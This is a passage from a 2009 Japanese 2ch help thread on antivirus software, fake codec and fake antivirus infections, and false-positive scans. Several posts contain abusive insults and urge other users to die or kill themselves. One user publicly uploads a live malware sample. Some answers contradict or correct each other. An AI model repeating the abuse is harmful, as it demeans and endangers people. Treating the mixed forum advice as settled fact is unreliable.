      (_)__)|___,/          (__)_)_)ヽ、__/
691名無しさん@お腹いっぱい。:2009/07/27(月) 14:55:07
PCをリカバリしようと思うんですが、リカバリされるのはCドライブだけですよね?
Dドライブがウィルス感染してる事はないんですか?
692名無しさん@お腹いっぱい。:2009/07/27(月) 15:02:23
> Cドライブだけですよね?
そうとも限らない。
> Dドライブがウィルス感染してる事はないんですか?
可能性としてはある。
693名無しさん@お腹いっぱい。:2009/07/27(月) 16:58:09
セキュリティソフトに関して質問です。

会社で私用のノートパソコンを使っています。
OSのクリーンインストールなども終えたものです。OSはWindows2000です。

うちの会社はセキュリティ意識が皆無な零細企業なので、少しでも良いものをと
今まではカスペルスキーを入れていました。ところが更新しようとしたらWindows2000には
未対応との事。そこで、新しい別のソフトを探しています。

有料でももちろん構いません。出来るだけ安心できるものを教えて下さい。
今は一応、Kingsoftのセキュリティを入れていますが、ウィルスを見つけても
どんなウィルスか分からないので困っています。(名前で検索しても中国のサイトしかでてこない)
同僚がウィルスを引っさげてくる事が多いので、ちょっとKingsoftのフリーだと不安なので…。
宜しくお願いします。
694 ◆N9P3SuvBPo :2009/07/27(月) 17:40:49
28日(日本時間は29日)に緊急Updateがあるそうで。
ttp://www.itmedia.co.jp/enterprise/articles/0907/27/news011.html
695名無しさん@お腹いっぱい。:2009/07/27(月) 18:47:02
>>694
d
696名無しさん@お腹いっぱい。:2009/07/27(月) 20:06:10
>>694
今月末にFlash PlayerのUpdateもあるよね。
697 ◆N9P3SuvBPo :2009/07/27(月) 20:35:14
>696
Adobe Readerもね。
698名無しさん@お腹いっぱい。:2009/07/27(月) 21:50:04
(・∀・)デッデデデ デッデデデ♪
699名無しさん@お腹いっぱい。:2009/07/28(火) 00:54:02
鑑定
700名無しさん@お腹いっぱい。:2009/07/28(火) 01:02:00
>>694-697
質問に対する回答でない貼付けや雑談は邪魔なので、どっか行ってくれないかな。

>>693
安心できるという意味では、カスペが駄目なら、AntiVirかな。W2Kにも対応しています。
但し、英語表示なので、初心者さんにはお勧めできないのが難点。
ただ、英語表記の敷居の高さを差し引いても、検出率と動作の軽さは圧倒的です。

あとは、シングルコアCPUだと重い場面もありますが、Avastも結構いい感じにブロックしてくれます。
AvastとかAVGのようなフリー版のあるソフトでも、Kingsoftよりは検出率いいですよ。(PFWを別途用意する必要はありますが)

検出率的にはG DATAもいいんだけど、W2Kには対応せずなので駄目ですね。
701名無しさん@お腹いっぱい。:2009/07/28(火) 01:05:04
>>700
死ね殺されろ
リアルでしね
702名無しさん@お腹いっぱい。:2009/07/28(火) 01:08:44
>>700
OKでやれや雑魚
703名無しさん@お腹いっぱい。:2009/07/28(火) 02:11:20
(*^ー゚)b
704名無しさん@お腹いっぱい。:2009/07/28(火) 09:08:33
>>700
遅れましたが、御返答ありがとうございます。
AntiVir、検討してみます:)
ありがとうございました。
705名無しさん@お腹いっぱい。:2009/07/28(火) 13:41:29
【使用OS】      Vista
【PCスペック】    CPU: 2.27GHz メモリ: 2GB  
【使用ブラウザ】  
【Microsoft Updateの更新の状態】 『』 例、自動更新設定
【セキュリティソフトと年式】    フレッツウイルスクリアv6
【その他スパイウェア対策ソフト】  フレッツウイルスクリアv6
【回線の種類・ルータの有無】  光回線でルータ使用中

【具体的な症状】 海外のサイトにアクセスしてしまい、それ以来インターネットをすると海外の広告が出てくる。
         インターネットのネットワーク接続で設定し直すと海外サイトが出てこなくなった。
         しかし電源を切るとインターネットができない状態に。そのときもまたネットワーク接続で設定し直すと繋がるようになる。
         今はその繰り返しです。厄介なウイルスに感染しているのでしょうか?
         ご覧の通り初心者ですがアドバイスおねがいします。



                                 
706名無しさん@お腹いっぱい。:2009/07/28(火) 16:46:20
【使用OS】      XP Home
【PCスペック】    CPU:1.8GHz メモリ:736MB
【使用ブラウザ】   IE
【Microsoft Updateの更新の状態】 『』 例、自動更新設定
【セキュリティソフトと年式】    avast!4.8
【その他スパイウェア対策ソフト】 『』
【回線の種類・ルータの有無】  『』 例、光回線でルータ使用中

【具体的な症状】検査でトロイの木馬が検出されたのですがディスクに充分な空き領域がなくチェストに移動できません
        チェストの最大容量の値を増やせば良いとの事ですがどのくらいの値にするのが適切でしょうか?
        現在は256MBに設定されています
707名無しさん@お腹いっぱい。:2009/07/28(火) 17:48:14
Win98SEで使えるフリーのアンチウイルスソフトあるかな?
500MHz 256MB
708名無しさん@お腹いっぱい。:2009/07/28(火) 18:09:14
avast!
709 ◆N9P3SuvBPo :2009/07/28(火) 18:41:53
>707
今のところAvastですね。
俺は今AVG7.5を使ってますが、サポート終わったからねー…
でもマイクロソフトのサポートが終わったOSを使い続けるなら、
新しいPCを購入したほうが良いかと。
(俺も98SE使ってるから偉く言えませんけど)
710名無しさん@お腹いっぱい。:2009/07/28(火) 19:01:26
>>706
256MBに収まらない程被害が広がったなら、すっぱり諦めて
フォーマット、リカバリーしとけ。
711名無しさん@お腹いっぱい。:2009/07/28(火) 19:27:53
>>707
穴だらけのOSにアンチウィルス入れたところでどの程度効果があるかまず考えてみろ
712名無しさん@お腹いっぱい。:2009/07/28(火) 19:42:12
穴だらけだからこそ、だよ。
713名無しさん@お腹いっぱい。:2009/07/28(火) 20:36:13
>>700
>検出率と動作の軽さは圧倒的です

何を持ってして軽いといってるんだ ウンコ

>Avastも結構いい感じにブロックしてくれます
結構いい感じにブロックってどんな感じなんだ ウンコ

ちんぽこ ようやく毛が生えたか?
714八頭 ◆YAGApwSaEw :2009/07/28(火) 20:51:19
>>705
http://pc11.2ch.net/test/read.cgi/sec/1247110729/24 を試してみてください

検出内容は報告してください
715名無しさん@お腹いっぱい。:2009/07/28(火) 21:16:37
>>714
カエレ

>>705
大人しくPCリカバリしましょう。
716名無しさん@お腹いっぱい。:2009/07/28(火) 21:38:14
>>705
・「a-squared Free 4.5」 ウイルス・トロイの木馬のスキャンと駆除 (*常駐保護は無し *日本語インターフェイス )
  ttp://www.emsisoft.com/en/software/free/
  サービス > 「a-squared Free Service」を無効 > 停止 > 適用で「自動アップデート常駐 a2service.exe」の停止=手動更新化
・「Malwarebytes' Anti-Malware 1.38」 ウイルス・スパイウェアのスキャンと駆除 (*常駐保護は無し *手動更新)
  ttp://www.malwarebytes.org/mbam.php
 *「Protection」タブの機能はNortonとの共存の為に設定しないで下さい
・「Avira AntiVir Personal 8 (*9は非常駐化×)」 ウイルス・トロイの木馬のスキャンと駆除
  ttp://www.free-av.com/en/download/download_servers.php (インストール過程 ttp://i40.tinypic.com/106cweu.jpg
  インストール完了後、「スタート」 > 「ファイル名を指定して実行(R)」 > 「msconfig」と入力
  システム構成ユーティリティのスタートアップタブで「avgnt」のチェックを外す (*非常駐化)
  サービス > 「Avira Free Antivirus Guard」 (デフォ : 開始-自動) → (無効→適用→OK)
  サービス > 「Avira Free Antivirus Scheduler」 (デフォ : 開始-自動) → (Update処理に必要なサービス)
  *Daily Update スケジュールを停止したい場合 (*手動更新化 ttp://i39.tinypic.com/14tqf5.jpg
・「ReducedPermissions」 (手動Windows Updateやオンラインスキャンはエラーに *導入時には「ブロックの解除」設定を)
・「Spyware Blaster 4.2」 危険サイトの制限、危険ActiveXの実行制限を施してくれます (*手動更新)

・「Live OneCare PC セーフティ (オンラインスキャン)」 (*スキャン終了後の「体験版」インストールはキャンセル)
  ttp://onecare.live.com/site/ja-jp/default.htm?s_cid=sah
・「マカフィー オンラインスキャン」 ttp://www.mcafee.com/japan/mcafee/home/freescan.asp
  *駆除は出来ませんので、もし検出があった場合にはNortonスレ内で感染報告して下さい
717707:2009/07/28(火) 21:54:54
ありがとう
PCない部屋に置いとこうと思った
んだけど今PCサーバ買ったからこいつは他の事に使おうと思う
718名無しさん@お腹いっぱい。:2009/07/28(火) 21:56:20
>>716
に続いて
>>601
もやること
719名無しさん@お腹いっぱい。:2009/07/29(水) 01:55:23
Avira Antivir入れWindowsDefenderと組み合わせて使おうと考えてるんだけど
aviraの最新版だとスパイウェアにも対応してるって見たんだけど
もしかしてwindowsデイフェンダーの常駐機能は無効になったりする?
それとも仲良くやってくれる?
720名無しさん@お腹いっぱい。:2009/07/29(水) 03:20:46
特に問題もなく、仲良くやってるなうちではw
721名無しさん@お腹いっぱい。:2009/07/29(水) 04:08:06
有料ソフト買ってるなんて情弱だよな
722名無しさん@お腹いっぱい。:2009/07/29(水) 08:04:53
>>721
初心者が考えそうなことだな
723名無しさん@お腹いっぱい。:2009/07/29(水) 08:18:16
>>723
初心者のくせに(プッ
724名無しさん@お腹いっぱい。:2009/07/29(水) 08:42:55
>>719
その手のチェックものは複数同時に走らないように注意した方が無難です。
普段問題なく動いているように見えても、問題物を見つけたときに互いに
邪魔し合う可能性があるので。
725名無しさん@お腹いっぱい。:2009/07/29(水) 13:21:01
cookieの名前が勝手に変わることってあるんでしょうか?
むかしはcookie:本名@〜だったのに、最近はcookie:蒼@〜になっているんです。
ウイルス検索してもトロイ?やウイルスは何も出てこないのですが、何か分かる方いらっしゃったら教えて欲しいです。
おねがいします。
726名無しさん@お腹いっぱい。:2009/07/29(水) 13:41:39
他スレで回答もらいましたのでもういいです。
ここって詳しい人いないんですね。
727名無しさん@お腹いっぱい。:2009/07/29(水) 13:46:59
>>725ですが、私は回答をもらっていませんので誤解のないようにお願いします。
728名無しさん@お腹いっぱい。:2009/07/29(水) 15:43:47
CodecWMV-3.5.exeのコーデックをインストールしてPCがおかしくなってしまいました
advanced virus removerとゆうセキュリティソフトをダウンロードして
勝手に何度も立ち上がるようにしてしまいます

HDのフォーマットも出来ず、レジストリの削除も出来なくなっています
Application cannot be executed. The file is infected. Please activated antivirus software.
で止まってしまいます

いい解決方法がありましたら教えてください
よろしくお願いします
729名無しさん@お腹いっぱい。:2009/07/29(水) 15:56:15
まだ修正の来ていない Flash Player の脆弱性とやらを利用されてトロイ攻撃されたり、ネットバンクのPASSが抜かれたりといったようなことがありえるものでしょうか?
730名無しさん@お腹いっぱい。:2009/07/29(水) 16:08:02
>>714>>715>>716
本当にありがとうございました。試してみます。
少し脱線しますがどうやってそのようにPCに詳しくなっていくのでしょうか。
今回何もできない自分が情けなくて。。
731728です:2009/07/29(水) 16:21:03
【使用OS】      『XP SP3』 
【PCスペック】    『CPU:1.6GHz 、メモリ:1.99GB』  
【使用ブラウザ】  『IE』 
【Microsoft Updateの更新の状態】 『自動更新設定』 
【セキュリティソフトと年式】     『ウイルスバスター2008』 
【その他スパイウェア対策ソフト】 『無し』
【回線の種類・ルータの有無】  『光回線でルータ使用中』 

【具体的な症状】 『』
【過程と措置】   『』
【その他】  『』
【スクリーンショット画像やテキストファイルをアップロード出来るサイト】
732MBAM:2009/07/29(水) 17:22:57
>>731
お困りのようですね
協力しますから悪いやつをとっちゃいましょう

ステップbyステップでいきましょう
まず、ここへ行き
http://www.malwarebytes.org/
Malwarebytes' Anti-Malwareのフリーバージョンをダウンロード
ぺ−ジの左の青いやつ
そして、すべてのプログラムを閉じて
mbam-setup.exeをwクリックでインストール

Malwarebytes' Anti-Malware(以下mbam)を立ち上げupdateする

そしたらScannerからPerform quick scanをクリック
約3分位で、すぐ終わります
そして、OKをクリック

次は、Show Results
をクリック
そしたら、悪いやつが沢山でてきたら
Remove Selectedをクリック

そしたら、MBAMが再起動します(reboot)

再起動したらMBAMが、logを提出します
MBAMを閉じます

ここまでやってみて下さい

733MBAM:2009/07/29(水) 17:29:02
>>731
忘れてた、MBAMする前にシステムの復元を破棄すること
734名無しさん@お腹いっぱい。:2009/07/29(水) 17:42:40
感染しました

トロイの木馬Generic13.AWQH

どうしたらいいですか?
735名無しさん@お腹いっぱい。:2009/07/29(水) 18:40:52
>>734
1.PCリカバリ
2.WindowsUpdateを全部あてる
3.セキュリティソフトを入れる
4.セキュリティソフトのパターンを更新する
5.アプリケーションを入れたり、メールの設定をしたり、元の環境に戻します
6.感染後に入力した可能性のあるパスワード類を全て別のものに変更する

順番を間違えないように。どうしても消しては困るデータがあった場合に限り、PCリカバリの前にバックアップを取ること。
736名無しさん@お腹いっぱい。:2009/07/29(水) 18:53:34
>>728
Fake Codec(コーデックの偽者)を入れちゃったんですね。

>HDのフォーマットも出来ず
OSインストール用のディスクでフォーマットは可能だと思います。

どうしても救出したいデータがない場合は、さくっとPCリカバリ(BTOパソコンなどの場合はOS再インストール)を。

どうしても救出したいデータがある場合、一番簡単なのは、別のHDDにOSを入れて、そっちから起動させることです。
セーフモードで起動して、レジストリを操作できるように戻して、自動起動してしまうものを除去して…という方法も
できなくはありませんが、初心者さんに説明するのが難しいので、その方法はパスで。

>>732さんが、Malwarebytes' を紹介していますが、未対応のものだった場合、除去できません。
CodecWMV-3.5.exe をどこで入手したのか判れば、同じものを入手して、どこのセキュリティソフトが
対応しているか確認することはできますが、現時点では、PCリカバリ以外の解決策を提示できません。
737名無しさん@お腹いっぱい。:2009/07/29(水) 19:06:07
>>730
冗談抜きに、PCの再インストールを繰り返した数だけ、スキルアップすると思ってる位でいいかと。

自分が困った時、こんなことをやってみたいと思った時に、調べたり、人に聞いたりして1つづつ
できることを増やしていく位でいいんじゃないかな。
738MBAM:2009/07/29(水) 19:07:54
>>736
要は、
c:\Program Files\AdvancedVirusRemover
c:\Program Files\AdvancedVirusRemover\PAVRM.exe
%UserProfile%\Application Data\Microsoft\Internet Explorer\Quick Launch\Advanced Virus Remover.lnk
%UserProfile%\Desktop\Advanced Virus Remover.lnk
%UserProfile%\Start Menu\Advanced Virus Remover.lnk

HKEY_CURRENT_USER\Software\AVR
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\CpMRU

コレを、取り除けばいいんだよ
だから、ステップbyステップでやろうとしてるんだよ
理解してる?
MBMAとSuperantispywareでほとんど完治する
もちろん、セーフモードでもスキャンする
なんでもかんでも、大手術するやぶ医者は、必要ない
ただの、フェイクセキュリティソフトでしょ
薬で治ればそれで良し
リカバリは、その次にやれば良い
針小棒大に、素人を脅すなよ
739名無しさん@お腹いっぱい。:2009/07/29(水) 19:19:01
>>738
うむ
実に的を獲ている
740名無しさん@お腹いっぱい。:2009/07/29(水) 19:28:19
>>729
あるよ
741名無しさん@お腹いっぱい。:2009/07/29(水) 19:35:48
>>738
入手元がはっきりしないと、入っているのが、想定している物とは違う可能性があります。
想定しているものでない場合、本当に除去できるとは限りません。

FakeAVは、数日に1つは新しいものが出ていますので、MBAMで対応しているとは限りません。

また、導入したファイル名がはっきりしている今回の相談者さんはましな方ですが、
どこで踏んだのかわからない、なにが入っているかわからない状況のものを、確実に安全な環境に
戻す為には、PCリカバリが一番確実な解決策です。

ぶっちゃけ>>26
742名無しさん@お腹いっぱい。:2009/07/29(水) 20:37:50
virus totalでスキャンしたとき 7.5%(3/40)って結果が出たんですがどうするべきでしょうか?

感知したアンチウイルスはa-squaredやIkarusで高リスクのトロイです。

感染したファイルは市販のソフトです。
743八頭 ◆YAGApwSaEw :2009/07/29(水) 20:42:49
>>728
コーデック類は罠な場合が多いので、信頼出来るコーデックを正式サイトからダウンロードすべきだったね
ダウンロードしたURLも覚えてないの?

>>742
内容を見せてくれないとなんとも・・・
744名無しさん@お腹いっぱい。:2009/07/29(水) 20:47:05
>>743
あんたに見せてもなにも解決しない。もう出てくるんじゃねーぞ。
745名無しさん@お腹いっぱい。:2009/07/29(水) 20:48:01
内容とはスキャンの内容でしょうか?

a-squared 4.5.0.24    2009.07.29     Virus.Win32.Sality!IK
Ikarus T3.1.1.64.0    2009.07.29     Virus.Win32.Sality
Sophos 4.44.0       2009.07.29     Sus/UnkPacker

感知したのは上記の3つなんですがどうでしょうか。
746名無しさん@お腹いっぱい。:2009/07/29(水) 20:48:35
>>742
信用できる配布元の場合、検出したベンダーに誤検出の疑いとして検体提出を行ってください。
判断が付かない場合は、配布元に報告する程度で。

使い続けるかどうかは自己責任でご判断ください。
747八頭 ◆YAGApwSaEw :2009/07/29(水) 20:51:30
>>745
AviraとAVGに検体提出をして返信メールを待てばいいよ

Avira AntiVir
ttp://www.avira.com/en/support/submit_suspicious_files.html
AVG
ttp://www.grisoft.com/jp.faq.num-771#faq_771
748名無しさん@お腹いっぱい。:2009/07/29(水) 20:58:00
>>746、747
ファイルを検体提出してきます。

回答していただきありがとうございました。
749名無しさん@お腹いっぱい。:2009/07/29(水) 21:12:14
>>745
Ikarusはヒューリスティック効き過ぎで、検出力高いが誤検出も非常に多い諸刃の剣。
a-squaredも同様に誤検出が多いので定評がある。しかも最新Ver.はIkarusエンジン搭載している。
末尾のIKはIkarusエンジンでのナニだろう。
Sophosでの頭にSusが付いてるのは擬陽性ということ。
よってこのケースは十中八九誤検出で間違いなし。市販のソフトなんだろ。
750728:2009/07/29(水) 21:18:15
MBAMさん
ありがとうございます 早速試してみます
>>736さん
大事なデーターは別HDに移動してありますので最悪リカバリを考えています

アップローダー 斧 2MB Sc_22457.zip
パスzzzzzzzx 
感染の原因となったファイル一応アップさせていただきました
明日には消します

751名無しさん@お腹いっぱい。:2009/07/29(水) 21:29:18
>>750
まだ、ほとんどのベンダーがすり抜けてるようですね。

検体提出はしておきますので早ければ数日でベンダーが対応してくると思いますが、
現時点では、セキュリティソフトでの除去は考えないほうがよさそうです。さくっとPCリカバリしてしまいましょう。

CodecWMV-3.5.exe(5/41)
ttp://www.virustotal.com/analisis/160104dd92341d275059f2893103a97bbf711c5cf7b27341924954f6b6011e70-1248870734

AntiVir、Panda、Prevx、Risingが対応。他はスルー。
752八頭 ◆YAGApwSaEw :2009/07/29(水) 21:30:47
>>750
オートランワーム(危険)だね

>>2の自動実行を停止する設定にしてから
●IPA 「外部記憶メディアのセキュリティ対策を再確認しよう!」 ― USB メモリ、便利のウラに落とし穴 ―
ttp://www.ipa.go.jp/security/txt/2008/12outline.html
●IPA「 USB メモリのセキュリティ対策を意識していますか? 」 ― USB メモリの安全な使い方を知ろう ―

ウイルスバスター(トレンドマイクロ) へ検体提出してください
ttp://inet.trendmicro.co.jp/esolution/supform.asp


Symantecとa-squaredとMalwarebytesとMicrosoftに提出しておきました
753名無しさん@お腹いっぱい。:2009/07/29(水) 21:33:42
余談ですが、昨晩パターン更新したAntiVirではスルー対象でした。
今、パターンを更新してからスキャンした所、検知しましたので、かなり新しいもののようですね。
754名無しさん@お腹いっぱい。:2009/07/29(水) 21:34:38
>>752
お前は出てこなくていいから。
755名無しさん@お腹いっぱい。:2009/07/29(水) 21:46:05
>>752
いつもリンク貼るだけ貼って、主語と句読点が無いからとても見づらい。
756名無しさん@お腹いっぱい。:2009/07/29(水) 21:49:33
【使用OS】      『XP SP2』
【PCスペック】    『CPU: AMD Athlon64X2 6000+ 3GHz 、メモリ: 2GB』
【使用ブラウザ】  『Firefox 2』
【Microsoft Updateの更新の状態】 『自動更新設定』 
【セキュリティソフトと年式】     『avast、Bitdefender CL版』
【その他スパイウェア対策ソフト】 『spybot、spywareblaster』
【回線の種類・ルータの有無】  『ADSL』 

【具体的な症状】
「コンピュータウイルス入門」というサイト
ttp://www.geocities.jp/excelover/virus.html (危険と思われるので注意!)

このサイトを見たらavastが反応しました、接続を遮断という処置をとり
その後BitdefenderのCL版でCドライブをスキャンしましたがウイルスは見つかりませんでした

これがavastのログです(hは抜いてあります)
Sign of "VBS:MailWorm-gen [Wrm]" has been found in "ttp://www.geocities.jp/excelover/virus.html\{gzip}" file.

どうすればよいでしょうか?感染していないと見て大丈夫でしょうか?
757名無しさん@お腹いっぱい。:2009/07/29(水) 21:53:29
遮断したならほとんどの場合は大丈夫です。

たまに、複数の攻撃手段をとって、そのうちの幾つかだけ遮断して、実際はすり抜けて感染されている
なんてこともあるので、保証まではできないです。
758 ◆N9P3SuvBPo :2009/07/29(水) 21:57:38
>756
ページ中段辺りに青文字で
>アンチウイルスソフトによっては「このページが感染している」旨のメッセージを出すと思うが、このようなテキストとして閲覧する限りは
>感染の心配はないのでご安心を。
と書かれてました。
おそらくその下のソースコードに反応してるんじゃないかと。
759名無しさん@お腹いっぱい。:2009/07/29(水) 22:01:45
>>725もおねがいします。
windowsXP SP3 520MB 120GB よろしくおねがいします。
760 ◆N9P3SuvBPo :2009/07/29(水) 22:05:39
>759
通常ではありえませんな。
家族の誰かがユーザー名を勝手に変えたんじゃない?
761756:2009/07/29(水) 22:13:06
>>757 >>758
ありがとうございました
762728:2009/07/29(水) 22:29:13
MBAM様
mbanを使用しlogを提出しようと思ったらIEも2chブラウザもエラーが起きてしまい
手間取りました 今はfira foxでなんとか・・・

早速log提出させていただきます 凄い数で驚きました
1度では文字数オーバーしてしまいますので
また斧にUPさせていただきました お手数おかけします
斧 2MB Sc_22503.txt
パスzzzzzzzx
よろしくお願いします
763名無しさん@お腹いっぱい。:2009/07/29(水) 22:31:21
>>760
(ο^д^)ノシ
764八頭 ◆YAGApwSaEw :2009/07/29(水) 22:35:23
>>762
752の設定をしたら
一度PCを再起動して下さい
走りっぱなしだと駆除できないからね

765名無しさん@お腹いっぱい。:2009/07/29(水) 22:46:24
>>762
MBAM=八頭は、信用できない回答者です。相手にせずに、PCリカバリを行ってください。
今回のケースでは、まだ対応していない可能性が高いため、セキュリティソフトでの除去を考えない方が良さそうです。
766名無しさん@お腹いっぱい。:2009/07/29(水) 22:48:36
>>765
同一人物じゃないと思うぞ

MBAMがこの先もコテをつづけるようならこのスレ潰すことになっても
粘着する
767728:2009/07/29(水) 22:49:25
もう一度mbanで検索してみたんですが気になるエラーがあったので
報告させていただきます
An error occurred. Please report the following error code to the
Malwarebytes Anti-Malware support team.
Error code : 731(0.6)
768名無しさん@お腹いっぱい。:2009/07/29(水) 22:51:34
>>767
うぜえ死ね
寝てるうちに母親にでも殺されろ
769名無しさん@お腹いっぱい。:2009/07/29(水) 23:11:10
>>767
それはマルウェアの検知ではなく、ソフトのエラーです。

サポートチームに連絡してくださいとありますが、(そのソフト使ってる人には悪いですけど)無視して構いません。
多分、感染中のマルウェアが動作を阻害したとかそんなことではないでしょうかね。

MBAMをいじっていても解決しませんので、PCのリカバリを行ってください。
なんとなくいじるのが楽しくなったなら、勝手にやっててください。(但し、感染を余所に撒き散らす前に復旧させてね)
770728:2009/07/29(水) 23:12:47
リカバリーします
ありがとうございました
771名無しさん@お腹いっぱい。:2009/07/29(水) 23:15:12
>>769
自殺しろ
772名無しさん@お腹いっぱい。:2009/07/29(水) 23:16:48
わかりました
死にます
773名無しさん@お腹いっぱい。:2009/07/29(水) 23:17:35
さようなら
774 ◆N9P3SuvBPo :2009/07/30(木) 01:58:06
MDLで見つけた危険サイトのソースをVirusTotalに掛けて見たのだが…
まだどこも対応してないという結果
ttp://www.virustotal.com/jp/analisis/03f8d7f6006f15364b3325e4e496b1cc7b6fb94873d176f94f30fadda36742c6-1248886145

で、Iframeで飛ばされる先のサイトは“Kaspersky”と“Sophos”のみ
ttp://www.virustotal.com/jp/analisis/9e16d4a62c2fdda7a9a5b08a6f7132934ba7fc3a04e3104ff69312b0949024d0-1248886620

問題のURLは教えられないけどruドメインでした。
775名無しさん@お腹いっぱい。:2009/07/30(木) 02:00:32
マカフィーのウイルススキャンとPFWだけを入れてる場合、
IE7のフィッシング詐欺検出機能はONにした方がいいでしょうか?
776 ◆N9P3SuvBPo :2009/07/30(木) 02:05:16
>775
う〜んとりあえずしとけば、気休め程度になるかな〜…
他の人からレス待ってみては?
777名無しさん@お腹いっぱい。:2009/07/30(木) 02:15:52
>>776
早速ありがとうございます。
とりあえずONにしましたw
どなたか「マカの機能とかぶってる」と思われる方がおられたら教えてください。
サイトアドバイザはうざいので入れてません。
778名無しさん@お腹いっぱい。:2009/07/30(木) 02:35:50
>>774
それ、さっき各社に検体提出したので大人しく待て。
あと、どう見てもスレ違いだからここに書くのはやめれ。
779名無しさん@お腹いっぱい。:2009/07/30(木) 10:12:47
OS:WinXP
CPU:Pen4
Mem:512MB

職場で使ってるのはこんな構成のノートPCなんだけど、あんまり重くなくて
それなりにセキュリティの高いオススメソフトを教えてください。

ウィルスセキュリティZERO使ってたら、職場で流行ってた
USB経由のトロイに感染してたから、別のを探してます。
780名無しさん@お腹いっぱい。:2009/07/30(木) 10:14:33
>>759です。
>>760
ありがとうございました。
通常ではありえないことと聞き、とても驚いています。
ウイルスバスターやノートンオンラインをし、スパイウェアなども調べたのですが、何も出てきません・・。
未知のウイルスに感染して、このような状態になってしまったrということでしょうか?
cookie:本名(4文字の本名です)@〜がcookie:蒼@〜になったのはやっぱり異常ですよね。
外部から操作されている可能性もあるのでしょうか?
おねがいします。
781名無しさん@お腹いっぱい。:2009/07/30(木) 10:44:29
>>779
軽くてまともなセキュリティソフトと言ったら、ESS(NOD32)かAntiVirの2択かな。
初心者向けなのは、日本語表示のESS(Eset Smart Security)。

但し、AntiVirに比べると検出能力の点では劣ります。(ウイルスセキュリティZEROと違って、ごく普通程度ではありますが)
782名無しさん@お腹いっぱい。:2009/07/30(木) 10:51:08
>>781
ありがとうございます。ESSを検討してみます。
783名無しさん@お腹いっぱい。:2009/07/30(木) 11:00:21
>>780もおねがいします。
対処法が分からず、困っております。
784名無しさん@お腹いっぱい。:2009/07/30(木) 11:34:17
>>780
ttp://support.microsoft.com/kb/417513/ja
これかな?
785 ◆N9P3SuvBPo :2009/07/30(木) 17:37:56
>>778
検出可否スレのほうが早かったようですね。
その検出可否スレに八頭が出現した件についてですが、
相変わらずモザイク付きのスクショを貼るとは、勘違いも甚だしいですよねえ?

>784
結局2バイト文字でログオンというオチですか。
786名無しさん@お腹いっぱい。:2009/07/30(木) 19:09:08
すみません。ウイルスバスターのことについてお尋ねします。

アップデート機能を開始しダウンロード完了後のインストール中によくファイアウォールが10〜20秒の間、無効になります。
その間、パソコンが無防備になっているのではないかと思うのですが、これは気にしなくても良い範囲なんでしょうか?
787 ◆N9P3SuvBPo :2009/07/30(木) 19:27:46
>786
その代わりにWindowsの標準FWが有効になるから問題ないです。
788名無しさん@お腹いっぱい。:2009/07/30(木) 19:40:55
>787
でも、ウイルスバスターが無効になった時にセキュリティセンターの警告で、ファイアウォールが無効になっています。コンピュータが危険にさらされている可能性があります。
と表示されます。
この表示が出ていてもWindowsの標準FWは有効になっているんですか?
何か設定が必要だったりするのでしょうか?
789名無しさん@お腹いっぱい。:2009/07/30(木) 19:45:13
神経質すぎ
790名無しさん@お腹いっぱい。:2009/07/30(木) 21:32:01
さっきなんか急にメモリの空きがなくなって
(タスクマネージャで見てもあまり使ってないのに他のソフトで警告された)
その後データ実行防止しましたとかいわれました
どういう意味ですかね
791名無しさん@お腹いっぱい。:2009/07/30(木) 21:34:38
なんかのウィルスですかね?
とりあえずメモリーは解放されたんで大丈夫ですかね?
792名無しさん@お腹いっぱい。:2009/07/30(木) 21:36:44
なんかすげー心配
なんだったんですかね
あれ
793名無しさん@お腹いっぱい。:2009/07/30(木) 21:37:14
>>786
バスターの基幹部分のソフトがアップデートされ、再起動をかけている状態ですね。
PCを起動して、セキュリティソフトが起動するまでのタイムラグのようなものですので、
気にしなくていい範囲です。

但し、その間は、(メッセージ通り)セキュリティソフトが無効になっていますので、
他のタスクを実行せず保護が開始されるまで待った方がよいでしょう。

>>787-788
なりませんよ。メッセージ通り無効の状態です。
794名無しさん@お腹いっぱい。:2009/07/30(木) 21:40:39
>>790
メモリリークしてたり、無効なアドレスを読みに行こうとしたものがDEP(データ実行防止)によってブロックされたようですね。
バグのあるアプリを使用しているのか、意図的に他のタスクに侵入しようとしたのが阻止されたのかはわかりません。

790-792さんが同じであると仮定すれば、メモリリークしてるソフトがブロックされただけでしょう。
795名無しさん@お腹いっぱい。:2009/07/30(木) 21:45:53
>>794
ありがとうございます
安心していいんすかね
796 ◆N9P3SuvBPo :2009/07/30(木) 22:00:44
>793
バスターってとんでもないセキュリティソフトですね。
常駐してる時は標準のFWを無効にするのは良い事だけど、
非常駐の時は標準のFWを有効に戻してくれたっていいじゃないか。
ルータ有れば別に気にすることないが…。
797名無しさん@お腹いっぱい。:2009/07/30(木) 22:06:48
>>796
日記は他に書いて
ここは雑談スレじゃない
798名無しさん@お腹いっぱい。:2009/07/30(木) 22:08:06
ハチ公 早くノートンスレ立てろよ
799名無しさん@お腹いっぱい。:2009/07/30(木) 22:22:54
チラ裏カキコ
786は、よくPFWが無効になる。というけれど、
通常のアップデートはパターンファイルだからPFWは有効のままが普通だと思うのだが…。
多分現行Ver(2008,2009)を使用しているのだろうが、これらはうpだての度にPFWが無効になってしまうようになったのかな。
それとも頻繁にPFW本体のうpが行われているのだろうか?
800 ◆N9P3SuvBPo :2009/07/30(木) 22:30:39
俺って危険なサイト踏んでも感染しない無敵の環境
ゼロデイだろうが全然関係ないし。
だからこそ特攻することができるのである!
801名無しさん@お腹いっぱい。:2009/07/30(木) 22:40:09
>>800
(ο^д^)ノシ
802 ◆N9P3SuvBPo :2009/07/30(木) 22:57:27
>801
φ(´д`)ノシ
803名無しさん@お腹いっぱい。:2009/07/30(木) 23:36:37
>>793
やはり無防備になってしまっているんですね。
気にしなくて良い範囲とのことでホッとしました。
でも、やっぱり不安なのでインストールが始まったらLANケーブルを抜いておくようにします。
ありがとうございます。

>>796
そうですよね。数多くのシェアを持っている一流企業のソフトなのだから、そういったところのケアも考えてほしいものですよね。
やはりルーターと二段構えで守るのが一番いいのでしょうが、4台のパソコンに設定とかしなきゃならないと思うと気が重いw

>>799
はい。あなたのおっしゃる通り、パターンファイルの書き込みのみのときはPFWが無効になることはありません。
アップデート時にメールなんちゃらの更新っていうのやその他の更新がある時にPFWが無効になります。
たまにPFWは有効でウイルスチェック機能が一時止まるといった状態でインストールが行われることもあります。
ただ、アップデートを繰り返しているとメールなんちゃらの更新などが行われる機会が結構多い上、そのたびにPFWが無効になっています。
それで気になって調べてみたのですが、わからなかったため質問させていただいた次第でございます。
804名無しさん@お腹いっぱい。:2009/07/30(木) 23:45:37
>>802
(ο^д^)ノシ
805799:2009/07/31(金) 00:11:41
>>803
